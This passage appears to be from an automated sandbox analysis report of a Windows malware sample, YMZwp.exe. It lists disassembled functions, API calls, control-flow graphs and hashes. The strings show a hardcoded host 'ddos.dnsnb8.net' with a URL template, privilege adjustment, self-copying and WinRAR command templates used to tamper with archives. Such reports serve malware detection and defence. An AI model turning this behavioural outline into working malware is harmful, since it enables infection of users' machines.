                                    • CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B3108E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1223616889-3273462101
                                    • Opcode ID: 02507e35edb9253946227f2862286f78945caaa4c150a7bee3b3661bc77364a7
                                    • Instruction ID: f761fb8e6d38cb7756c85464fa0f725af8e1632d86f63d5f30eeaa518beb55ab
                                    • Opcode Fuzzy Hash: 02507e35edb9253946227f2862286f78945caaa4c150a7bee3b3661bc77364a7
                                    • Instruction Fuzzy Hash: DE0184B120425CBFE7345F649CC8F2BBBECDB44BA9F204929F245A3090DA705E448B70
                                    Function 00B36076 Relevance: 11.1, APIs: 7, Instructions: 611memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 229 b36076-b36079 230 b360e0-b360eb 229->230 231 b3607b-b36080 229->231 234 b360ee-b360f4 230->234 232 b36082-b36085 231->232 233 b360f7-b360f8 231->233 235 b36087 232->235 236 b360f6 232->236 237 b360fa-b360fc call b366c8 233->237 238 b360fe-b36106 233->238 234->236 235->234 241 b36089-b36095 235->241 236->233 237->238 239 b36155-b36189 VirtualFree 238->239 240 b36108-b3611d 238->240 251 b3618c-b36192 239->251 243 b3611f-b36121 240->243 244 b360a1-b360aa 241->244 245 b36097-b3609f 241->245 247 b36123 243->247 248 b36151-b36154 243->248 249 b360b0-b360c1 VirtualAlloc 244->249 250 b361ba-b361c8 244->250 245->244 247->248 254 b36125-b36128 247->254 248->239 255 b360c7-b360cf 249->255 252 b36243-b36251 250->252 253 b361ca-b361d7 250->253 251->255 256 b36198-b361b0 VirtualFree 251->256 261 b36253 252->261 262 b36264-b3626f 252->262 257 b361dd-b361e0 253->257 258 b36134-b3613b 254->258 259 b3612a-b3612e 254->259 255->251 260 b360d5-b360df VirtualAlloc 255->260 256->250 263 b361b2-b361b4 256->263 257->252 265 b361e2-b361f2 257->265 273 b36130-b36132 258->273 274 b3613d-b3614f 258->274 259->258 259->273 260->230 268 b36255-b36258 261->268 264 b36271-b36276 262->264 263->250 270 b36389-b363b1 VirtualProtect 264->270 271 b3627c-b36289 264->271 272 b361f5-b361fe 265->272 268->262 269 b3625a-b36262 268->269 269->268 277 b363b7-b363ba 270->277 285 b36292-b36298 271->285 286 b3628b 271->286 275 b36200-b36203 272->275 276 b3620c-b36219 272->276 273->243 274->243 279 b36205-b36208 275->279 280 b3621b-b36228 275->280 281 b36238-b3623f 276->281 282 b363fc-b363ff VirtualProtect 277->282 283 b363bc-b363c2 277->283 287 b3622a-b36236 279->287 288 b3620a 279->288 280->281 281->272 290 b36241 281->290 284 b36400-b36416 282->284 283->283 289 b363c4 283->289 291 b36420-b36425 284->291 292 b36418-b3641d 284->292 293 b362a2-b362ac 285->293 286->285 287->281 288->281 289->282 294 b363c6-b363cf 289->294 290->257 295 b362b1-b362c8 293->295 296 b362ae 293->296 297 b363d1 294->297 298 b363d4-b363d8 294->298 299 b36373-b36384 295->299 300 b362ce-b362d4 295->300 296->295 297->298 301 b363da 298->301 302 b363dd-b363e1 298->302 299->264 305 b362d6-b362d9 300->305 306 b362da-b362f1 300->306 301->302 303 b363e3 302->303 304 b363e7-b363fa VirtualProtect 302->304 303->304 304->277 304->282 305->306 308 b362f3-b362f9 306->308 309 b36365-b3636e 306->309 310 b36314-b36326 308->310 311 b362fb-b3630f 308->311 309->293 313 b36328-b3634a 310->313 314 b3634c-b36360 310->314 312 b36426-b364a9 311->312 322 b364ab-b364c0 312->322 323 b36519-b3651c 312->323 313->309 314->312 329 b364c2 322->329 330 b36535-b36537 322->330 324 b36583-b36587 323->324 325 b3651d-b3651e 323->325 327 b36588-b3658b 324->327 328 b36522-b36533 325->328 331 b365a1-b365a3 327->331 332 b3658d-b3658f 327->332 328->330 335 b364c5-b364cd 329->335 336 b364f8 329->336 333 b3659a 330->333 334 b36539 330->334 337 b36591-b36593 332->337 340 b3659b-b3659d 333->340 338 b365b4 334->338 339 b3653b-b36541 334->339 341 b36542-b36545 335->341 342 b364cf-b364d4 335->342 343 b364fa-b364fe 336->343 344 b3656c-b3656f 336->344 337->340 345 b36595 337->345 350 b365be-b365dc 338->350 339->341 340->337 346 b3659f 340->346 347 b3654d-b36550 341->347 348 b36517-b36518 342->348 349 b364d6-b364d9 342->349 351 b36572 343->351 352 b36500 343->352 344->351 345->333 346->327 347->350 353 b36552-b36556 347->353 348->323 349->347 354 b364db-b364f5 349->354 358 b365dd-b36608 350->358 356 b36573-b36576 351->356 352->328 357 b36502 352->357 359 b36578-b3657a 353->359 361 b36558-b36569 353->361 354->336 356->359 357->356 360 b36504-b36513 357->360 359->358 362 b3657c-b3657f 359->362 360->330 363 b36515 360->363 361->344 362->324 363->348
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00B360BE
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00B360DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B36189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B361A5
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 214a5efbb38501acf98b0ef0f25cf05595c748dbc9a96ad472dd3ce3ac3f35db
                                    • Instruction ID: 012476c4e725977220e1eba57e130646d50e2974401733492c4044f8b3548f54
                                    • Opcode Fuzzy Hash: 214a5efbb38501acf98b0ef0f25cf05595c748dbc9a96ad472dd3ce3ac3f35db
                                    • Instruction Fuzzy Hash: 7D0247B2508785AFDB328F24CC85BEA7BF0EF12310F2985EDD8858B692D774A901C755
                                    Function 00B32C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 375 b32c48-b32c75 memset call b31973 378 b32cb2-b32cb9 375->378 379 b32c77-b32c7f 375->379 382 b32cbb-b32cc2 VirtualFree 378->382 383 b32cc8-b32ccc 378->383 380 b32c81-b32c8b 379->380 381 b32c8f-b32cac CreateThread WaitForMultipleObjects 379->381 380->381 381->378 382->383
                                    APIs
                                    • memset.MSVCRT ref: 00B32C57
                                      • Part of subcall function 00B31973: PathFileExistsA.SHLWAPI(00B34E5C,00000000,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B31992
                                      • Part of subcall function 00B31973: CreateFileA.KERNEL32(00B34E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00B319BA
                                      • Part of subcall function 00B31973: Sleep.KERNEL32(00000064), ref: 00B319C6
                                      • Part of subcall function 00B31973: wsprintfA.USER32 ref: 00B319EC
                                      • Part of subcall function 00B31973: CopyFileA.KERNEL32(00B34E5C,?,00000000), ref: 00B31A00
                                      • Part of subcall function 00B31973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B31A1E
                                      • Part of subcall function 00B31973: GetFileSize.KERNEL32(00B34E5C,00000000), ref: 00B31A2C
                                      • Part of subcall function 00B31973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00B31A46
                                      • Part of subcall function 00B31973: ReadFile.KERNEL32(00B34E5C,00B34E60,00000000,?,00000000), ref: 00B31A65
                                    • CreateThread.KERNEL32(00000000,00000000,00B32B8C,00000000,00000000,00000000), ref: 00B32C99
                                    • WaitForMultipleObjects.KERNEL32(00000001,00B316BA,00000001,000000FF,?,00B316BA,00000000), ref: 00B32CAC
                                    • VirtualFree.KERNEL32(00A40000,00000000,00008000,C:\Users\user\AppData\Local\Temp\YMZwp.exe,00B34E5C,00B34E60,?,00B316BA,00000000), ref: 00B32CC2
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\YMZwp.exe, xrefs: 00B32C69
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                    • API String ID: 2042498389-3918798735
                                    • Opcode ID: 3ba77cba2b81976d4fbb0fe69993421a2c632763c9cc67781a21d8c6abd46ab7
                                    • Instruction ID: 02f2dc40e84d706c6f5bbf020b75b143cbe504b39361aade8d20bf967a85852f
                                    • Opcode Fuzzy Hash: 3ba77cba2b81976d4fbb0fe69993421a2c632763c9cc67781a21d8c6abd46ab7
                                    • Instruction Fuzzy Hash: 3D018F716412307AD718ABA5EC0AFAF7EECEF01B60F704190B905D61D1EAA0EA44C7F0
                                    Function 00B314E1 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 384 b314e1-b314fb 385 b31541-b31547 384->385 386 b314fd-b31510 GetModuleHandleA 384->386 389 b31573-b31574 call b31638 385->389 390 b31549-b3154c 385->390 387 b31512-b31518 386->387 388 b3151a-b31535 VirtualQuery 386->388 387->385 392 b31537-b31539 388->392 393 b3153b 388->393 396 b31579-b3157a ExitProcess 389->396 394 b31569-b31570 390->394 395 b3154e-b31555 390->395 392->385 392->393 393->385 395->394 397 b31557-b31566 call b31af9 395->397 397->394
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00B31504
                                    • VirtualQuery.KERNEL32(00B314E1,?,0000001C), ref: 00B31525
                                    • ExitProcess.KERNEL32 ref: 00B3157A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: ExitHandleModuleProcessQueryVirtual
                                    • String ID:
                                    • API String ID: 3946701194-0
                                    • Opcode ID: eb0d46976433c0cd2a142af5d98a06062c4be7502d511b0ceeea3e1e1c62fcdc
                                    • Instruction ID: 5707733b8aaca468da8707f3047f1445e20c4e6bdcab45cb65393789ec364ac4
                                    • Opcode Fuzzy Hash: eb0d46976433c0cd2a142af5d98a06062c4be7502d511b0ceeea3e1e1c62fcdc
                                    • Instruction Fuzzy Hash: E2115A75940204EFCB20DFAEA885A7EB7ECEBA4711F31447AF402E3150DB34AD419B50
                                    Function 00B31915 Relevance: 4.5, APIs: 3, Instructions: 41timeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 400 b31915-b31922 401 b31924-b31926 400->401 402 b31928-b3192c 400->402 403 b3196e-b31970 401->403 404 b3194f-b31952 402->404 405 b3192e-b3194d memset GetFileTime 402->405 404->403 407 b31954-b31960 SetFileTime 404->407 406 b31966-b31968 405->406 408 b3196a 406->408 409 b3196c 406->409 407->406 408->409 409->403
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: FileTimememset
                                    • String ID:
                                    • API String ID: 176422537-0
                                    • Opcode ID: 3867824248f789159075bd3b8ccadb61a1b8964aef46e8e6c2bb22a5fc24d784
                                    • Instruction ID: 0be931d42a05a80ed8143955aa75e42c99b0c4f5d6f6f0cf9b12e5e9a99551fa
                                    • Opcode Fuzzy Hash: 3867824248f789159075bd3b8ccadb61a1b8964aef46e8e6c2bb22a5fc24d784
                                    • Instruction Fuzzy Hash: E9F06832200209BFD720DE2ADC04BAB77ECEB50761F208A76F516D5050EB30D646CBB0
                                    Function 00B36158 Relevance: 2.6, APIs: 2, Instructions: 56memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 410 b36158-b36189 VirtualFree 411 b3618c-b36192 410->411 412 b360c7-b360cf 411->412 413 b36198-b361b0 VirtualFree 411->413 412->411 414 b360d5-b360f8 VirtualAlloc 412->414 415 b361b2-b361b4 413->415 416 b361ba-b361c8 413->416 436 b360fa-b360fc call b366c8 414->436 437 b360fe-b36106 414->437 415->416 417 b36243-b36251 416->417 418 b361ca-b361d7 416->418 422 b36253 417->422 423 b36264-b3626f 417->423 420 b361dd-b361e0 418->420 420->417 425 b361e2-b361f2 420->425 427 b36255-b36258 422->427 424 b36271-b36276 423->424 429 b36389-b363b1 VirtualProtect 424->429 430 b3627c-b36289 424->430 431 b361f5-b361fe 425->431 427->423 428 b3625a-b36262 427->428 428->427 435 b363b7-b363ba 429->435 449 b36292-b36298 430->449 450 b3628b 430->450 433 b36200-b36203 431->433 434 b3620c-b36219 431->434 441 b36205-b36208 433->441 442 b3621b-b36228 433->442 443 b36238-b3623f 434->443 444 b363fc-b36416 VirtualProtect 435->444 445 b363bc-b363c2 435->445 436->437 438 b36155-b36189 VirtualFree 437->438 439 b36108-b3611d 437->439 438->411 447 b3611f-b36121 439->447 451 b3622a-b36236 441->451 452 b3620a 441->452 442->443 443->431 455 b36241 443->455 458 b36420-b36425 444->458 459 b36418-b3641d 444->459 445->445 453 b363c4 445->453 456 b36123 447->456 457 b36151-b36154 447->457 460 b362a2-b362ac 449->460 450->449 451->443 452->443 453->444 461 b363c6-b363cf 453->461 455->420 456->457 462 b36125-b36128 456->462 457->438 463 b362b1-b362c8 460->463 464 b362ae 460->464 465 b363d1 461->465 466 b363d4-b363d8 461->466 467 b36134-b3613b 462->467 468 b3612a-b3612e 462->468 469 b36373-b36384 463->469 470 b362ce-b362d4 463->470 464->463 465->466 471 b363da 466->471 472 b363dd-b363e1 466->472 479 b36130-b36132 467->479 480 b3613d-b3614f 467->480 468->467 468->479 469->424 477 b362d6-b362d9 470->477 478 b362da-b362f1 470->478 471->472 473 b363e3 472->473 474 b363e7-b363fa VirtualProtect 472->474 473->474 474->435 474->444 477->478 482 b362f3-b362f9 478->482 483 b36365-b3636e 478->483 479->447 480->447 484 b36314-b36326 482->484 485 b362fb-b3630f 482->485 483->460 487 b36328-b3634a 484->487 488 b3634c-b36360 484->488 486 b36426-b364a9 485->486 496 b364ab-b364c0 486->496 497 b36519-b3651c 486->497 487->483 488->486 503 b364c2 496->503 504 b36535-b36537 496->504 498 b36583-b36587 497->498 499 b3651d-b3651e 497->499 501 b36588-b3658b 498->501 502 b36522-b36533 499->502 505 b365a1-b365a3 501->505 506 b3658d-b3658f 501->506 502->504 509 b364c5-b364cd 503->509 510 b364f8 503->510 507 b3659a 504->507 508 b36539 504->508 511 b36591-b36593 506->511 514 b3659b-b3659d 507->514 512 b365b4 508->512 513 b3653b-b36541 508->513 515 b36542-b36545 509->515 516 b364cf-b364d4 509->516 517 b364fa-b364fe 510->517 518 b3656c-b3656f 510->518 511->514 519 b36595 511->519 524 b365be-b365dc 512->524 513->515 514->511 520 b3659f 514->520 521 b3654d-b36550 515->521 522 b36517-b36518 516->522 523 b364d6-b364d9 516->523 525 b36572 517->525 526 b36500 517->526 518->525 519->507 520->501 521->524 527 b36552-b36556 521->527 522->497 523->521 528 b364db-b364f5 523->528 532 b365dd-b36608 524->532 530 b36573-b36576 525->530 526->502 531 b36502 526->531 533 b36578-b3657a 527->533 535 b36558-b36569 527->535 528->510 530->533 531->530 534 b36504-b36513 531->534 533->532 536 b3657c-b3657f 533->536 534->504 537 b36515 534->537 535->518 536->498 537->522
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00B360DF
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B36189
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B361A5
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Virtual$Free$Alloc
                                    • String ID:
                                    • API String ID: 1852963964-0
                                    • Opcode ID: 1bd291ca92c6046e0e8ac7cafa179e74ac6e6ccb46a0d637f355d21bc548992e
                                    • Instruction ID: cec9562e4a485a25210b97ade792ce90f379ed4bd6ec69418d5d767187cf83d6
                                    • Opcode Fuzzy Hash: 1bd291ca92c6046e0e8ac7cafa179e74ac6e6ccb46a0d637f355d21bc548992e
                                    • Instruction Fuzzy Hash: 99115B31A00649DBCF318E588C857DE37E1EF01300F6A8559DE896F291DA712940CB94

                                    Non-executed Functions

                                    Function 00B3119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,?,?,00B313EF), ref: 00B311AB
                                    • OpenProcessToken.ADVAPI32(00000000,00000028,00B313EF,?,?,?,?,?,?,00B313EF), ref: 00B311BB
                                    • AdjustTokenPrivileges.ADVAPI32(00B313EF,00000000,?,00000010,00000000,00000000), ref: 00B311EB
                                    • CloseHandle.KERNEL32(00B313EF), ref: 00B311FA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00B313EF), ref: 00B31203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\YMZwp.exe, xrefs: 00B311A5
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                    • API String ID: 75692138-3918798735
                                    • Opcode ID: 3484c0dcfcf3e05d518337180adfd0ecd1573be15d704b3d464195f4f7e32000
                                    • Instruction ID: c4c59f71d4a5d6ce3fdc7b4c2ccb26dfc0f5e49cd8ab74cca6ad7453c242626d
                                    • Opcode Fuzzy Hash: 3484c0dcfcf3e05d518337180adfd0ecd1573be15d704b3d464195f4f7e32000
                                    • Instruction Fuzzy Hash: 1101E4B5900209EFEB00DFE8CD89AAFBBF8FB04705F204569E606A2250DB719F449B50
                                    Function 00B3239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strstr.MSVCRT ref: 00B323CC
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B32464
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00B32472
                                    • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00B324A8
                                    • memset.MSVCRT ref: 00B324B9
                                    • strrchr.MSVCRT ref: 00B324C9
                                    • wsprintfA.USER32 ref: 00B324DE
                                    • strrchr.MSVCRT ref: 00B324ED
                                    • memset.MSVCRT ref: 00B324F2
                                    • memset.MSVCRT ref: 00B32505
                                    • wsprintfA.USER32 ref: 00B32524
                                    • Sleep.KERNEL32(000007D0), ref: 00B32535
                                    • Sleep.KERNEL32(000007D0), ref: 00B3255D
                                    • memset.MSVCRT ref: 00B3256E
                                    • wsprintfA.USER32 ref: 00B32585
                                    • memset.MSVCRT ref: 00B325A6
                                    • wsprintfA.USER32 ref: 00B325CA
                                    • Sleep.KERNEL32(000007D0), ref: 00B325D0
                                    • Sleep.KERNEL32(000007D0,?,?), ref: 00B325E5
                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B325FC
                                    • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00B32611
                                    • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00B32642
                                    • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00B3265B
                                    • SetEndOfFile.KERNEL32 ref: 00B3266D
                                    • CloseHandle.KERNEL32(00000000), ref: 00B32676
                                    • RemoveDirectoryA.KERNEL32(?), ref: 00B32681
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                    • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 2203340711-4019750759
                                    • Opcode ID: 47684c2fc0c25a3f07ca0ea0991814e2f79832c9baebeff00e9bb8b16c386586
                                    • Instruction ID: 9120f300814d5ee930273a25c0420275b77f49b3ccb11f26f6ea0566a6725890
                                    • Opcode Fuzzy Hash: 47684c2fc0c25a3f07ca0ea0991814e2f79832c9baebeff00e9bb8b16c386586
                                    • Instruction Fuzzy Hash: 8481A1B1504304ABD7109F64DC85FAF77ECEF84B05F20095AFA44D31A0DB74EA498B66
                                    Function 00B3274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00B32766
                                    • memset.MSVCRT ref: 00B32774
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00B32787
                                    • wsprintfA.USER32 ref: 00B327AB
                                      • Part of subcall function 00B3185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,753C8400,http://%s:%d/%s/%s,?,?,?,00B31118), ref: 00B31867
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31878
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31880
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31890
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31894
                                    • wsprintfA.USER32 ref: 00B327C6
                                    • CopyFileA.KERNEL32(?,00B34C80,00000000), ref: 00B327D4
                                    • wsprintfA.USER32 ref: 00B327F4
                                      • Part of subcall function 00B31973: PathFileExistsA.SHLWAPI(00B34E5C,00000000,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B31992
                                      • Part of subcall function 00B31973: CreateFileA.KERNEL32(00B34E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00B319BA
                                      • Part of subcall function 00B31973: Sleep.KERNEL32(00000064), ref: 00B319C6
                                      • Part of subcall function 00B31973: wsprintfA.USER32 ref: 00B319EC
                                      • Part of subcall function 00B31973: CopyFileA.KERNEL32(00B34E5C,?,00000000), ref: 00B31A00
                                      • Part of subcall function 00B31973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B31A1E
                                      • Part of subcall function 00B31973: GetFileSize.KERNEL32(00B34E5C,00000000), ref: 00B31A2C
                                      • Part of subcall function 00B31973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00B31A46
                                      • Part of subcall function 00B31973: ReadFile.KERNEL32(00B34E5C,00B34E60,00000000,?,00000000), ref: 00B31A65
                                    • DeleteFileA.KERNEL32(?,?,00B34E54,00B34E58), ref: 00B3281A
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00B34E54,00B34E58), ref: 00B32832
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                    • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                    • API String ID: 692489704-1525515996
                                    • Opcode ID: 2b68c97a79feeee3ec2cc8d22ce815103655b97bc200f2bd7633fe452ddff748
                                    • Instruction ID: d99d6070f177e5e1a746b2880bebf2f11640973c9559fd55cb99d4ca2d77533f
                                    • Opcode Fuzzy Hash: 2b68c97a79feeee3ec2cc8d22ce815103655b97bc200f2bd7633fe452ddff748
                                    • Instruction Fuzzy Hash: 4A2154B694021C7BDB10E7A49C89FDB77ECEB04B44F5005E1B644E3051E674EF848AA0
                                    Function 00B31581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON
                                    Download Yara Rule
                                    APIs
